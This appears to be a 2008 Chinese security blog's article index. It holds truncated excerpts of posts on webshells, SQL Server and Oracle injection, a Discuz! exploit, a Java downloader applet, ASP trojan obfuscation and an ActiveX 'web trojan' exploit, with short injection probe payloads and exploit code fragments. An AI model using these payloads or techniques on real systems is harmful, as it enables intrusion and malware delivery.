排序:
默认
按更新时间
按访问量
RSS订阅

Aspxshell 1.1 开源发布

 作者:cnqing一、目录结构Aspxshell├─插件目录├─插件目录├─…….├─…….└─Loader 程序加载器├─bin│ ├─Debug 程序发布目录│ │ └─remoter 插件远程程序集目录。。。。。二、客户端向服务端POST数据结构程序集         ...

2008-11-20 17:15:00

阅读数:1301

评论数:0

Sql2005注入辅助脚本[修改版]

from hackbase版权所有:http://www.pcsec.orgBK瞬间群感谢无敌小黄瓜的投递原始代码可见http://hi.baidu.com/tr4c3/blog/item/da1c1c30c93da89ca9018e27.html经过黄瓜修改代码,功能更加强大了,希望能给大家的渗...

2008-11-20 17:13:00

阅读数:879

评论数:0

Discuz! 6.x/7.x SODB-2008-13 Exp

from sebug.net测试方法:[www.sebug.net]本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!/usr/bin/php/** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释...

2008-11-20 17:11:00

阅读数:899

评论数:0

犀利的 oracle 注入技术

 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1 and 1的形式即可。(用" a|| ...

2008-10-20 10:45:00

阅读数:613

评论数:0

制作安全网站的checklist

from idv2 fcicq最近在IPA上看到一篇安全相关的文章,它的最末尾有个checklist,于是催我把它翻译了。前几天比较忙,周末没什么事儿了,就翻译一下吧。原文的标题是如何让网站更安全。这里仅翻译文章最后的一个checklist。2008/4/20更新:fcicq倒是神速啊,马上就把具...

2008-10-20 10:39:00

阅读数:581

评论数:0

Java 下载者 IE & FF

 import java.applet.Applet; import java.io.*; import java.net.URL; import java.net.URLConnection; public class Client extends Applet {     public Cli...

2008-10-15 10:34:00

阅读数:684

评论数:0

点击劫持(Clickjacking)漏洞技术内幕

 Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙:  当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用ly...

2008-10-15 08:59:00

阅读数:718

评论数:0

Asp木马技术分析

 Asp木马技术分析现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的asp木马一般有数个文件,随着asp木马的易用性、隐蔽性以及强大的可执行性,因此得到越来越的黑客和入侵者的青睐,...

2008-08-28 10:53:00

阅读数:1118

评论数:0

ASP加密

 大家在入侵中应该是捡到过别人的Webshell吧?也许有的大马功能很好,于是你就用了,但是你没想过该马可能有后门?现在很多的大马都加密了,打开时候一片乱码,是不是也想加密自己的大马了,加密后的Webshell不仅可以防止别人捡我们的Shell用,还能免杀webshell。ASP木马加密不难,让我...

2008-08-28 10:50:00

阅读数:1931

评论数:0

关于AJAX注入

 来源:0x37 SecurityAJAX可以让数据在后台无声无息地进行,假如有办法让你的JS脚本与这个AJAX模块在同域内的话,那可以使用这个XSS来完成二次攻击,并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX,直接构造URL里的参数值;POST型的AJAX...

2008-08-28 10:50:00

阅读数:1115

评论数:0

编程通过WMI获取系统信息

 要了解WMI,请查阅:http://www.microsoft.com/china/technet/community/scriptcenter/resources/wmifaq.mspx#EJC 。       WMI是一组COM对象,其接口比较多,详细请参考:http://msdn.micr...

2008-08-26 16:59:00

阅读数:2277

评论数:0

vbs 一些脚本

 什么是 Runomatic?你不想我们来破坏你自己找到答案时的那种惊奇感,是吧?任务1:检索计算机名老实告诉你吧,通过脚本来检索计算机名的途径数不胜数。但是因为 WMI 将要成为检索信息的主流技术,所以我们所展示的是一段返回目标计算机名称的 WMI 脚本。strComputer = "...

2008-08-26 15:49:00

阅读数:1719

评论数:0

Perl Underground 5

  $$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ ...

2008-08-26 00:07:00

阅读数:5179

评论数:0

Cross Site Scripting - Attack and Defense guide

  ____ ...

2008-08-26 00:05:00

阅读数:1702

评论数:0

利用最基本的SQL注入渗透BBSXP官方网站的台后管理(科普)

 漏洞分析 序:有一部电影的名字叫着《全职杀手》,剧中的男主角托尔,我非常喜欢他的个性!他非常的cool,i like!呵呵,不知道你看过这部电影没有?不过,我今天要为大家讲解的故事发现在网络当中.这次是一次非常,常见的sql渗透攻击.也是最基础的.过程如下:1.找出漏洞并分析漏洞.2.利用漏洞,...

2008-07-17 10:07:00

阅读数:939

评论数:2

Dvbbs 8.2 login_sql注入漏洞探析

挺无聊的,分析下”洞网/”,环境架好后.找到有问题的语句:       End If       Else              username=trim(Dvbbs.CheckStr(request("username")))              If ajaxP...

2008-07-17 10:03:00

阅读数:2542

评论数:0

sql server 2005注入技巧集

 [sql server 2005,检测权限]and 1=(select IS_SRVROLEMEMBER(sysadmin))and 1=(select IS_SRVROLEMEMBER(serveradmin))and 1=(select IS_SRVROLEMEMBER(setupadmin...

2008-07-17 09:58:00

阅读数:1276

评论数:0

PHP数据库安全之SQL注入

 很多 web 开发者没有注意到 SQL 查询是可以被篡改的,因而把 SQL 查询当作可信任的命令。殊不知道,SQL 查询可以绕开访问控制,从而绕过身份验证和权限检查。更有甚者,有可能通过 SQL 查询去运行主机操作系统级的命令。   直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQ...

2008-07-17 09:38:00

阅读数:716

评论数:0

The Week of Baidu Bugs - Day 05: 百度空间多处XSS漏洞

 继续我们的XSS之旅,先来看一个YY漏洞XSS 5: 百度PDC CallBack XSS漏洞baidu pdc的imstate从名字上来看似乎是用来查询IM在线情况的,正常情况下的一个请求大致如下:http://pdc.baidu.com/imstate/?callback=IM_STATUS...

2008-07-16 11:22:00

阅读数:698

评论数:0

MS Office Snapshot Viewer ActiveX Exploit 最新网马

 经本站焦点核(X)安全技术咨询站测试 确实可以执行 被360拦截 微软尚未发布补丁可执行版,请勿用于非法用途。function killErrors() {return true;}window.onerror = killErrors;var x;var obj;var mycars = ne...

2008-07-16 11:18:00

阅读数:703

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭